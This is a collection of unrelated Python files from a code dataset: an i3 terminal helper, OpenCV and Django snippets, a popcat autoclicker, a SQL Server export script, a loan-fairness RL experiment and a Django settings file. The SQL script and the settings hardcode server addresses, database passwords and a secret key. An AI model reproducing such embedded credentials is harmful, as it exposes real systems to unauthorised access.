+{"seq_id":"56180585","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\"\"\"\n i3-quickterm.py\n ===============\n\n Description: A small drop-down terminal for i3wm.\n Author: lbonn \n Creation Date: 2016-12-26\n Modification Date: 2019-04-13\n\n\"\"\"\n\nimport copy\nimport fcntl\nimport json\nimport logging\nimport os\nimport shlex\nimport subprocess\nimport sys\nfrom typing import Tuple, Union\n\nfrom contextlib import contextmanager, suppress\nfrom pathlib import Path\n\nimport click\nimport i3ipc\n\n\nDEFAULT_CONF = {\n 'menu': \"rofi -dmenu -p 'quickterm: ' -no-custom -auto-select\",\n 'term': 'urxvt',\n 'history': '{$HOME}/.cache/i3/i3-quickterm.order',\n 'ratio': 0.25,\n 'pos': 'top',\n 'shells': {\n 'haskell': 'ghci',\n 'js': 'node',\n 'python': 'ipython3 --no-banner',\n 'shell': '{$SHELL}'\n }\n}\n\n\nMARK_QT_PATTERN = 'quickterm_.*'\nMARK_QT = 'quickterm_{}'\n\n\ndef TERM(executable: str,\n execopt: str = '-e',\n execfmt: str = 'expanded',\n titleopt: Union[str, None] = '-T',\n classopt: Union[str, None] = None) -> str:\n \"\"\" Helper to declare a terminal in the hardcoded list \"\"\"\n if execfmt not in ('expanded', 'string'):\n raise RuntimeError('Invalid execfmt')\n\n if titleopt is not None:\n executable += ' ' + titleopt + ' {title}'\n\n if classopt is not None:\n executable += ' ' + classopt + ' {class_name}'\n\n return executable + ' {} {{{}}}'.format(execopt, execfmt)\n\n\nTERMS = {\n 'alacritty': TERM('alacritty', titleopt='-t'),\n 'kitty': TERM('kitty', titleopt='-T', classopt='--class'),\n 'gnome-terminal': TERM('gnome-terminal', execopt='--', titleopt=None),\n 'roxterm': TERM('roxterm'),\n 'st': TERM('st'),\n 'termite': TERM('termite', execfmt='string', titleopt='-t'),\n 'urxvt': TERM('urxvt'),\n 'urxvtc': TERM('urxvtc'),\n 'xfce4-terminal': TERM('xfce4-terminal', execfmt='string'),\n 'xterm': TERM('xterm'),\n}\n\n\ndef conf_path() -> str:\n \"\"\" Returns the path to the configuration file. \"\"\"\n home_dir = os.environ['HOME']\n xdg_dir = os.environ.get('XDG_CONFIG_DIR', '{}/.config'.format(home_dir))\n\n return xdg_dir + '/i3/i3-quickterm.json'\n\n\ndef read_conf(fn: str) -> dict:\n \"\"\" Reads the configuration file.\"\"\"\n try:\n with open(fn, 'r') as f:\n c = json.load(f)\n\n return c\n\n except Exception as e:\n logging.error('invalid config file: {}'.format(e))\n return {}\n\n\n@contextmanager\ndef get_history_file(conf: dict) -> object:\n if conf['history'] is None:\n yield None\n return\n\n p = Path(expand_command(conf['history'])[0])\n\n os.makedirs(str(p.parent), exist_ok=True)\n\n f = open(str(p), 'a+')\n fcntl.lockf(f, fcntl.LOCK_EX)\n\n try:\n f.seek(0)\n yield f\n\n finally:\n fcntl.lockf(f, fcntl.LOCK_UN)\n f.close()\n\n\ndef expand_command(cmd: str, **rplc_map) -> str:\n logging.debug('expand_cmd: \"%s\" (%s)' % (cmd, rplc_map))\n d = {'$' + k: v for k, v in os.environ.items()}\n d.update(rplc_map)\n\n return shlex.split(cmd.format(**d))\n\n\ndef i3cmd(conn: i3ipc.Connection, cmd: str) -> None:\n \"\"\" Wrapper for conn.command that logs commands prior to running. 
\"\"\"\n logging.debug('i3 cmd: %s' % cmd)\n conn.command(cmd)\n\n\ndef move_back(conn: i3ipc.Connection, selector: str) -> None:\n i3cmd(conn, '{} floating enable, move scratchpad'.format(selector))\n\n\ndef pop_it(conn: i3ipc.Connection,\n mark_name: str,\n pos: str = 'top',\n ratio: float = 0.25) -> None:\n assert pos in ('top', 'bottom')\n ws, _ = get_current_workspace(conn)\n wx, wy = ws['rect']['x'], ws['rect']['y']\n wwidth, wheight = ws['rect']['width'], ws['rect']['height']\n\n width = wwidth\n height = int(wheight*ratio)\n posx = wx\n\n if pos == 'bottom':\n margin = 6\n posy = wy + wheight - height - margin\n\n else: # pos == 'top'\n posy = wy\n\n i3cmd(conn, (\n '[con_mark={mark}],'\n 'resize set {width} px {height} px,'\n 'move absolute position {posx}px {posy}px,'\n 'move scratchpad,'\n 'scratchpad show'\n ).format(\n mark=mark_name,\n posx=posx,\n posy=posy,\n width=width,\n height=height\n )\n )\n\n\ndef get_current_workspace(\n conn: i3ipc.Connection) -> Tuple[i3ipc.WorkspaceReply, object]:\n \"\"\" Get the focused workspace.\n\n Returns\n -------\n A tuple in form (workspace, con), with the focused workspace and\n the container object for the focused workspace, respectively.\n \"\"\"\n ws = [w for w in conn.get_workspaces() if w['focused']][0]\n tree = conn.get_tree()\n ws_tree = [c for c in tree.descendents()\n if c.type == 'workspace' and c.name == ws['name']][0]\n\n return ws, ws_tree\n\n\ndef toggle_quickterm_select(conf: dict) -> None:\n \"\"\" Hide a quickterm visible on current workspace or prompt\n the user for a shell type.\n \"\"\"\n conn = i3ipc.Connection()\n ws, ws_tree = get_current_workspace(conn)\n\n # is there a quickterm opened in the current workspace?\n qt = ws_tree.find_marked(MARK_QT_PATTERN)\n if qt:\n qt = qt[0]\n move_back(conn, '[con_id={}]'.format(qt.id))\n return\n\n with get_history_file(conf) as hist:\n # compute the list from conf + (maybe) history\n hist_list = None\n\n if hist is not None:\n with suppress(Exception):\n hist_list = json.load(hist)\n\n # invalidate if different set from the configured shells\n if set(hist_list) != set(conf['shells'].keys()):\n hist_list = None\n\n shells = hist_list or sorted(conf['shells'].keys())\n\n proc = subprocess.Popen(expand_command(conf['menu']),\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE)\n\n for r in shells:\n proc.stdin.write((r + '\\n').encode())\n\n stdout, _ = proc.communicate()\n shell = stdout.decode().strip()\n\n if shell not in conf['shells']:\n return\n\n if hist is not None:\n # put the selected shell on top\n shells = [shell] + [s for s in shells if s != shell]\n hist.truncate(0)\n json.dump(shells, hist)\n\n toggle_quickterm(conf, shell)\n\n\ndef quoted(s: str, char: str = \"'\") -> str:\n return char + s + char\n\n\ndef term_title(shell: str) -> str:\n \"\"\" Returns a title for the given shell. 
\"\"\"\n return '{} - i3-quickterm'.format(shell)\n\n\ndef toggle_quickterm(conf: dict, shell: str) -> None:\n \"\"\" Toggles an existing drop-down terminal for the given shell, or starts\n one if it is not running.\n \"\"\"\n conn = i3ipc.Connection()\n tree = conn.get_tree()\n shell_mark = MARK_QT.format(shell)\n qt = tree.find_marked(shell_mark)\n\n # does it exist already?\n if len(qt) == 0:\n logging.debug('no existing terminal for mark %s' % shell_mark)\n term = TERMS.get(conf['term'], conf['term'])\n qt_cmd = expand_command(conf['shells'][shell])[0]\n title = term_title(shell)\n classname = conf['term'] + '-quickterm'\n term_cmd = ' '.join(expand_command(\n quoted(term),\n title=quoted(title, '\"'),\n class_name=quoted(classname, '\"'),\n expanded=qt_cmd,\n string=quoted(conf['shells'][shell])\n ))\n\n done = False\n\n def on_window_focus(conn: i3ipc.Connection, event: i3ipc.WindowEvent):\n nonlocal done\n window = event.container\n logging.debug('focused window: \"%s\"' % window.window_instance)\n\n # FIXME: instance isn't necessarily what we expect..\n if not done and (window.window_instance == classname or\n window.window_instance == conf['term']):\n done = True\n shell_mark = MARK_QT.format(shell)\n i3cmd(conn, 'mark {}'.format(shell_mark))\n move_back(conn, '[con_mark={}]'.format(shell_mark))\n pop_it(conn, shell_mark, conf['pos'], conf['ratio'])\n\n conn.on('window::focus', on_window_focus)\n i3cmd(conn, 'exec %s' % term_cmd)\n conn.main(timeout=2)\n\n else:\n qt = qt[0]\n ws, ws_tree = get_current_workspace(conn)\n move_back(conn, '[con_id={}]'.format(qt.id))\n\n if qt.workspace().name != ws.name:\n pop_it(conn, shell_mark, conf['pos'], conf['ratio'])\n\n\n@click.command()\n@click.option(\n '-v', '--verbose',\n count=True,\n default=0,\n help='Controls the verbosity level.',\n type=int,\n)\n@click.argument(\n 'shell',\n default=None,\n nargs=1,\n required=False,\n type=str,\n)\ndef main(verbose: int, shell: str) -> int:\n \"\"\" A small drop-down terminal for i3wm. \"\"\"\n # Initialise logger\n logging.basicConfig(\n format=(\n '[%(asctime)s.%(msecs)03d %(levelname)s]'\n ' %(name)s.%(funcName)s:%(lineno)s %(message)s'\n ),\n datefmt='%Y-%m-%d %H:%M:%S',\n level=(30 - verbose * 10),\n )\n\n # Read configuration\n conf = copy.deepcopy(DEFAULT_CONF)\n conf.update(read_conf(conf_path()))\n\n if shell is None:\n toggle_quickterm_select(conf)\n return 0\n\n if shell not in conf['shells']:\n logging.error(\n 'Unknown shell \"%s\" (available shells: %s)',\n shell,\n ', '.join(list(conf['shells'].keys()))\n )\n return 1\n\n toggle_quickterm(conf, shell)\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main.main(sys.argv[1:], standalone_mode=False))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"396364651","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\nt0 = cap.read()[1]\nt1 = cap.read()[1]\n\n# 將此兩張影像分別進行灰階及高斯模糊處理\ngray1 = cv2.cvtColor(t0, cv2.COLOR_BGR2GRAY)\ngray2 = cv2.cvtColor(t1, cv2.COLOR_BGR2GRAY)\n\nblur1 = cv2.GaussianBlur(gray1,(7,7),0)\nblur2 = cv2.GaussianBlur(gray2,(5,5),0)\n\n# 使用cv2.absdiff計算並得出兩張影像的差異圖形\nd = cv2.absdiff(blur1, blur2)\n\n# 將差異圖形進行二值化處理(即黑白化)\nret, th = cv2.threshold( d, 10, 255, cv2.THRESH_BINARY )\n\n# 使用cv2.dilate進行擴張處理,可避免當移動速度過快差異不顯著時加強\ndilated=cv2.dilate(th, None, iterations=1)\n\ncontours, hierarchy = cv2.findContours(dilated,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\nareas = [cv2.contourArea(c) for c in contours]\n\nmax_index = np.argmax(areas)\n\ncnt=contours[max_index]\n\nx,y,w,h = cv2.boundingRect(cnt)\n\ncv2.drawContours(layer, cnt, -1, markColor, 2)\n\ncv2.rectangle(layer,(x,y),(x+w,y+h), markColor,2)\n\nCutted = t0[y:y + h, x:x + w]\n\nlayer = layer[y:y + h, x:x + w]\n","sub_path":"opencv/hand_0605/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"514396981","text":"# Running this as a command didn't work, but running it manually in the shell did.\nimport csv\nfrom backend.models import TtsEntry\n\nwith open('data_aug27.csv') as f:\n reader = csv.DictReader(f)\n for row in reader:\n obj, created = TtsEntry.objects.get_or_create(\n customer_number=row['customer_number'],\n day_part=row['day_part'],\n first_seen_local=row['first_seen_local'],\n first_seen_utc=row['first_seen_utc'],\n misc_id=row['id'],\n location=row['location'],\n model_id=row['model_id'],\n total_time_to_service=row['tts'],\n )","sub_path":"upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"246890780","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom selenium import webdriver\nimport pyautogui as py \nimport pandas as pd\nimport time\nfrom threading import Thread\n\n\n# In[2]:\n\n\nfrom pynput import keyboard\n\n\n# In[ ]:\n\n\nbrowser = webdriver.Chrome(executable_path=r'/Users/Yew Choong/Downloads/chromedriver_win32/chromedriver')\nbrowser.maximize_window()\nbrowser.get(\"https://popcat.click/\")\ntime.sleep(3)\n\n\n# In[ ]:\n\n\ndef exit_program():\n def on_press(key):\n if str(key) == 'Key.esc':\n main.status = 'pause'\n user_input = input('Program paused, would you like to continue? (y/n) ')\n\n while user_input != 'y' and user_input != 'n':\n user_input = input('Incorrect input, try either \"y\" or \"n\" ')\n\n if user_input == 'y':\n main.status = 'run'\n elif user_input == 'n':\n main.status = 'exit'\n exit()\n\n with keyboard.Listener(on_press=on_press) as listener:\n listener.join()\n\n\n# In[ ]:\n\n\ndef main():\n main.status = 'run'\n\n while True:\n py.click(x=705,y=400,interval=0.005)\n\n while main.status == 'pause':\n time.sleep(1)\n\n if main.status == 'exit':\n print('Main program closing')\n break\n\n\n# In[ ]:\n\n\nThread(target=main).start()\nThread(target=exit_program).start()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"416662977","text":"#coding=utf-8\nimport _mssql\nimport json\n\nimport sys\n\nimport sys\ndefault_encoding = 'utf-8'\nif sys.getdefaultencoding() != default_encoding:\n reload(sys)\n sys.setdefaultencoding(default_encoding)\n\n\n\nimport xlwt, xlrd\nfrom datetime import datetime\n\n\n\n\n\ndef getAllCountry():\n conn = _mssql.connect(server='101.201.47.50', user='sa', password='Investarget@2016', )\n # SELECT 短链接查询操作(一次查询将所有数据取出)\n sql = \"SELECT [User].Id,[User].Name,Organization.Name,Title.TitleC, [User].Mobile,[User].EmailAddress,[User].PartnerName FROM InvestargetDb_v2.dbo.[User]INNER JOIN InvestargetDb_v2.dbo.Organization ON [User].OrganizationId = Organization.Id INNER JOIN InvestargetDb_v2.dbo.Title ON [User].TitleId = Title.Id WHERE [User].OrganizationId IS NOT NULL AND [User].IsDeleted = 0 AND [User].Id IN (SELECT UserCommonTransaction.UserId FROM InvestargetDb_v2.dbo.UserCommonTransaction WHERE [UserCommonTransaction].IsDeleted = 0)\"\n conn.execute_query(sql)\n res = []\n for area in conn:\n res.append(area)\n conn.close()\n return res\n\ndef saveToFile(res):\n style0 = xlwt.easyxf('font: name Times New Roman, color-index red, bold on')\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet('A Test Sheet')\n\n\n hang = 0\n for row in res:\n lie = 0\n\n tags = getUserTag(row[0])\n remarks = getUserRemark(row[0])\n ws.write(hang, lie, str(row[1]))\n ws.write(hang, lie + 1, str(row[2]))\n ws.write(hang, lie + 2, str(row[3]))\n ws.write(hang, lie + 3, str(row[4]))\n ws.write(hang, lie + 4, str(row[5]))\n ws.write(hang, lie + 5, str(row[6]))\n ws.write(hang, lie + 6, tags)\n ws.write(hang, lie + 7, remarks)\n\n\n # f = open('user-1.txt', 'a')\n # f.writelines(str(row[1])+';'+str(row[2])+';'+str(row[3])+';'+str(row[4])+';'+str(row[5])+';'+str(row[6])+';'+tags+';'+remarks)\n # f.writelines('\\n')\n # f.close()\n hang = hang + 1\n wb.save('test.xls')\n\n\n\n\ndef getTags():\n conn = _mssql.connect(server='101.201.47.50', user='sa', password='Investarget@2016', )\n # SELECT 短链接查询操作(一次查询将所有数据取出)\n sql = \"SELECT User_Tags.UserId,Tag.TagNameC FROM InvestargetDb_v2.dbo.Tag INNER JOIN InvestargetDb_v2.dbo.User_Tags ON User_Tags.TagId = Tag.Id AND User_Tags.IsDeleted = 0\"\n conn.execute_query(sql)\n res = []\n for area in conn:\n res.append(area)\n conn.close()\n return res\n\n\ndef getRemarks():\n conn = _mssql.connect(server='101.201.47.50', user='sa', password='Investarget@2016', )\n # SELECT 短链接查询操作(一次查询将所有数据取出)\n sql = \"SELECT UserId,Remark FROM InvestargetDb_v2.dbo.UserRemarks WHERE UserRemarks.IsDeleted = 0\"\n conn.execute_query(sql)\n res = []\n for area in conn:\n res.append(area)\n conn.close()\n return res\n\nallremarks = getRemarks()\nallTags = getTags()\n\ndef getUserTag(userid):\n res = []\n for remark in allTags:\n if userid == remark[0]:\n res.append(remark[1])\n return '、'.join(res)\n\n\ndef getUserRemark(userid):\n res = []\n for remark in allremarks:\n if int(userid) == int(remark[0]):\n remarka = remark[1].replace('\\n', ' ').replace(';', '、')\n res.append(remarka)\n return '*'.join(res)\n\nsaveToFile(getAllCountry())\n\n","sub_path":"python/emptygit/saveExcel/user_trader.py","file_name":"user_trader.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"507865486","text":"from django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom channels.layers import get_channel_layer\nfrom asgiref.sync import async_to_sync\nfrom django.contrib.auth.models import User\nfrom django.template.loader import render_to_string\nfrom .models import Profile\n\n@receiver(post_delete,sender=User)\n@receiver(post_save, sender=User)\ndef change_user(sender, instance, *args, **kwargs):\n\tusers = User.objects.all()\n\thtml_users = render_to_string(\"includes/users.html\",{'users':users,'currect_user':instance.username})\n\n\tchannel_layer = get_channel_layer()\n\tasync_to_sync(channel_layer.group_send)(\n\t\t\"users\",\n\t\t{\n\t\t\t\"type\":\"user_update\",\n\t\t\t\"event\":\"New User\",\n\t\t\t'html_users': html_users,\n\t\t}\n\t)\n\n@receiver(post_save, sender=User)\ndef new_user(sender, instance, created, **kwargs):\n\tif created:\n\t\tProfile.objects.create(user=instance)\n\t\t\n\t\t","sub_path":"accounts/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"200498283","text":"import pandas as pd\nimport numpy as np\n\n\n\ndef output(test_Y,file_name):\n df_out = pd.DataFrame()\n test_csv = './data/test.csv'\n df_test = pd.read_csv(test_csv, header=0)\n arr_test = df_test.values\n test_ID = arr_test[0::,0]\n test_ID=test_ID.astype(int)\n df_out['id'] = test_ID\n df_out['response'] = test_Y\n df_out.to_csv('./results/'+file_name,index=False)\n\n","sub_path":"output_results.py","file_name":"output_results.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"525662957","text":"#-*-coding:utf-8-*-\n\"\"\"\nSolve a loan example using the constrained cross-entropy method\n\"\"\"\n\n\"\"\" Hyperparameters:\n In transition function:\n epsilon: Parameter in transition function when a = 0\n In reward function:\n lamda: trade-off parameter between the mean and the variance, positive\n I: the interest collected on the loan if repaid, positive\n P: the principal of the loan, positive\n In initial distribution:\n pZ: the parameter in initial state distribution\n alpha0, beta0, alpha1, beta0: parameters in initial states\n\"\"\"\n\nimport time, os, sys, logging\nimport tensorflow as tf\nimport numpy as np\nfrom shutil import copy2\n\nimport policyNetwork\nimport constrainedCEM\nimport envLoan\n\nfile_name_base = time.ctime()\nfile_name_base = file_name_base.replace(' ', '-')\nfile_name_base = file_name_base.replace(':', '-')\n\nbase_folder = \"/home/min/PycharmProjects/fairness/\"\n\nlog_folder = base_folder + \"EO_\" + file_name_base\n\nif not os.path.exists(log_folder):\n os.makedirs(log_folder)\n\nroot_folder = base_folder + \"venv\"\ncopy2(root_folder + '/CEM_loan_v2.py', log_folder)\ncopy2(root_folder + '/envLoan.py', log_folder)\ncopy2(root_folder + '/policyNetwork.py', log_folder)\ncopy2(root_folder + '/constrainedCEM.py', log_folder)\n\n\"\"\"Set up the logging part\"\"\"\nlogging.getLogger().setLevel(logging.ERROR)\n# logger = logging.getLogger(__name__)\nlogger = logging.getLogger(\"CEM_loan\")\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s [%(funcName)s:%(lineno)i] %(message)s',\n datefmt=\"%Y/%m/%d %H:%M:%S\")\n\nfh = logging.FileHandler(filename= log_folder + \"/\" + file_name_base + \"_console.log\", mode='a')\nfh.setLevel(logging.INFO)\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\nch = logging.StreamHandler(sys.stdout)\nch.setLevel(logging.INFO)\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\"\"\"Main program\"\"\"\nsess = tf.InteractiveSession()\nsess.run(tf.initializers.global_variables())\n\n\"\"\"Hyperparameters\"\"\"\naction_dim = 1\nstate_dim = 3\n\nrho = .1\n\nh = 50\ngamm = .8\n\n\"h0 is the number of steps to simulate to get the initial distribution for group 0 (with action 1)\"\n\"h1 is the number of steps to simulate to get the initial distribution for group 1 (with action 1)\"\n\"For z = 0, 1, there will be (hz+1) initial states\"\n# h0 = 1\n# h1 = 3\n# h0 = 1\n# h1 = 5\nh0 = 7\nh1 = 10\n\nn_samples = 50\nnl = 49\n\nalpha0 = 1.4614873\nbeta0 = 0.51479711\n\nalpha1 = 1.51578208\nbeta1 = 0.19009129\n\n# equal_opp_thres = 0.85237955\nequal_opp_thres = 0.82\n\npZ = 1-0.29294318\nI = 0.17318629\n# I = 0.041225\nP = 1\nlamda = .01\n# lamda = 0.1\nepsilon = .1 # don't change this\n\npolicy_net_struct = [25, 25]\n\nlogger.info(\"state_dim = \"+str(state_dim)+\", action_dim = \"+str(action_dim))\nlogger.info(\"rho = \"+str(rho)+\", h = \"+str(h)+\", n_samples = \"+str(n_samples)+\", epsilon = \"+str(epsilon)+\n \", nl = \"+str(nl))\nlogger.info(\"alpha0 = \"+str(alpha0)+\", beta0 = \"+str(beta0)+\", alpha1 = \"+str(alpha1)+\", beta1 = \"+str(beta1))\nlogger.info(\"pZ = \"+str(pZ)+\", I = \"+str(I)+\", P = \"+str(P)+\", lamda = \"+str(lamda)+\", gamm = \"+str(gamm))\n\nlogger.info(\"The policy network: \"+str(policy_net_struct))\n\n\"\"\"\nIn version0: the policy network takes 2 inputs: alpha/(alpha+beta) and z.\nIn version1: the policy network takes 3 inputs: alpha/(alpha+beta), alpha-beta, z.\n\"\"\"\npolicy = policyNetwork.PolicyNetwork(3, policy_net_struct)\nenv = 
envLoan.EnvLoan(state_dim, action_dim, h, epsilon, alpha0, alpha1, beta0, beta1, pZ, I, P, lamda, gamm, h1, h0)\n\n# print(env.set_init_state())\n\nagent = constrainedCEM.ConstrainedCEM(env, policy, n_samples, h, rho, nl, sess, equal_opp_thres, log_folder)\n\n# agent.train_demographic_parity()\nagent.train_equality_of_opportunity(equal_opp_thres)\n# agent.train_optimistic()\n# agent.train_race_blind()\n","sub_path":"venv/CEM_loan_v2.py","file_name":"CEM_loan_v2.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"560825710","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport ROOT\nimport json\nimport pickle\nimport os\n\nfrom DataFormats.FWLite import Events, Handle\nfrom Analysis.HLTAnalyserPy.EvtData import EvtData, EvtHandles,phaseII_products,add_product\n\nimport Analysis.HLTAnalyserPy.CoreTools as CoreTools\n\nclass PythonObjectEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, (list, dict, str, unicode, int, float, bool, type(None))):\n return json.JSONEncoder.default(self, obj)\n return {'_python_object': pickle.dumps(obj)}\n\ndef as_python_object(dct):\n if '_python_object' in dct:\n return pickle.loads(str(dct['_python_object']))\n return dct\n\n\n\nclass PUEventsInBX(object):\n def __init__(self,pu_sum):\n self.evt_ids = {x for x in pu_sum[3].getPU_EventID()}\n \n def overlap(self,rhs):\n return self.evt_ids.intersection(rhs.evt_ids)\n \n def nr_overlap(self,rhs):\n return len(self.overlap(rhs))\n \ndef read_pileup(in_filenames,prefix,maxevents=-1,verbose=False):\n\n products = []\n add_product(products,\"pu_sum\",\"std::vector0 and eventnr>maxevents:\n break\n\n evtdata.get_handles(event)\n pu_sum = evtdata.get(\"pu_sum\")\n\n# pu_list.append(PUEventsInBX(pu_sum))\n pu_list.append({(x.event(),x.luminosityBlock()) for x in pu_sum[3].getPU_EventID()})\n\n return pu_list\n\nif __name__ == \"__main__\":\n \n CoreTools.load_fwlitelibs()\n\n parser = argparse.ArgumentParser(description='example e/gamma HLT analyser')\n parser.add_argument('in_filenames',nargs=\"+\",help='input filename')\n parser.add_argument('--prefix','-p',default='file:',help='file prefix')\n parser.add_argument('--maxevents','-n',default=-1,help='max events, <0 is no limit')\n parser.add_argument('--verbose','-v',action='store_true',help='verbose printouts')\n parser.add_argument('--out','-o',default='output.json',help='output file')\n parser.add_argument('--out_root','-r',default='output.root',help='output root file')\n args = parser.parse_args()\n\n if not os.path.exists(args.out):\n print(\"reading output\")\n pu_list = read_pileup(args.in_filenames,args.prefix,args.maxevents,args.verbose)\n \n with open(args.out,'w') as f:\n json.dump(pu_list,f,cls=PythonObjectEncoder)\n \n with open(args.out,'r') as f:\n pu_list = json.load(f,object_hook=as_python_object)\n \n\n ref_event_nr = 0\n ref_event = pu_list[ref_event_nr]\n pu_list.pop(ref_event_nr)\n\n root_file = ROOT.TFile(args.out_root,\"RECREATE\")\n hist = ROOT.TH1D(\"overlapHist\",\"# in time PU events overlapping with a given event;# overlap PU events;#events\",251,-0.5,250.5)\n\n for event in pu_list:\n nr_overlap = len(ref_event.intersection(event))\n hist.Fill(nr_overlap)\n root_file.Write()\n\n\n","sub_path":"HLTAnalyserPy/test/getPUEvtsForEachEvt.py","file_name":"getPUEvtsForEachEvt.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"450806961","text":"# coding:utf-8\n# Django settings for hellouser project.\nimport sys\nimport os\n\n\nANONYMOUS_USER_ID = -1\n\nAUTH_PROFILE_MODULE = 'accounts.MyProfile'\n\nLOGIN_REDIRECT_URL = '/accounts/%(username)s/'\nLOGIN_URL = '/accounts/signin/'\nLOGOUT_URL = '/accounts/signout/'\n\n\n# SITE_ROOT = os.path.join(os.path.realpath(os.path.dirname(__file__)), '../../')\n\n\n# MEDIA_URL = 'http://192.168.1.114:8888/'\n# STATIC_URL = '/static/'\n# MEDIA_ROOT = os.path.join(SITE_ROOT, 'media')\n# STATIC_ROOT = os.path.join(SITE_ROOT, 'static')\n# TEMPLATE_DIRS = [os.path.join(SITE_ROOT, 'pinry/templates')]\n# STATICFILES_DIRS = [os.path.join(SITE_ROOT, 'pinry/static')]\n\n\nsettings_dir = os.path.dirname(__file__)\nPROJECT_ROOT = os.path.abspath(os.path.dirname(settings_dir))\n# print PROJECT_ROOT\n\n# PROJECT_ROOT = os.path.join(os.path.realpath(os.path.dirname(__file__)), '../../')\n\nADMINS = (\n # ('Your Name', 'your_email@example.com'),\n)\n\nugettext = lambda s: s\n\n# LOCALE_PATHS = (\n# os.path.join(PROJECT_ROOT, 'locale'),\n# )\n\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\n\nTIME_ZONE = 'Asia/Shanghai'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nLANGUAGE_CODE = 'zh-cn'\n\nADMINS = (\n # ('Your Name', 'your_email@example.com'),\n)\n\nMANAGERS = ADMINS\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'pinry',\n 'USER': 'root',\n 'PASSWORD': 'root',\n 'HOST': '192.168.1.117',\n # 'PASSWORD': 'bj8888',\n 'PORT': '5432',\n }\n}\n\n\nSECRET_KEY = '20061212'\n\n\nGRIDFS = {\n 'HOST': '192.168.1.117',\n 'PORT': 27017,\n 'DB': 'adleida',\n}\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = []\n\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\n# USE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale.\n# USE_L10N = True\n\n# If you set this to False, Django will not use timezone-aware datetimes.\n# USE_TZ = True\n\n\nMEDIA_URL = '/resources/'\n\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')\n# MEDIA_URL = '/media/'\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')\n# print STATIC_ROOT\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_ROOT, 'pinry/static/'),\n)\n\n\nTEMPLATE_DIRS = (\n os.path.join(PROJECT_ROOT, 'pinry/templates/'),\n)\n\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n \n 'compressor.finders.CompressorFinder'\n)\n\n# Make this unique, and don't share it with anybody.\n# SECRET_KEY = '3k8(%b!ptvdq7)_05nob(i^15$-s(^2%p-ls=@mwh4t_^^!v3g'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 
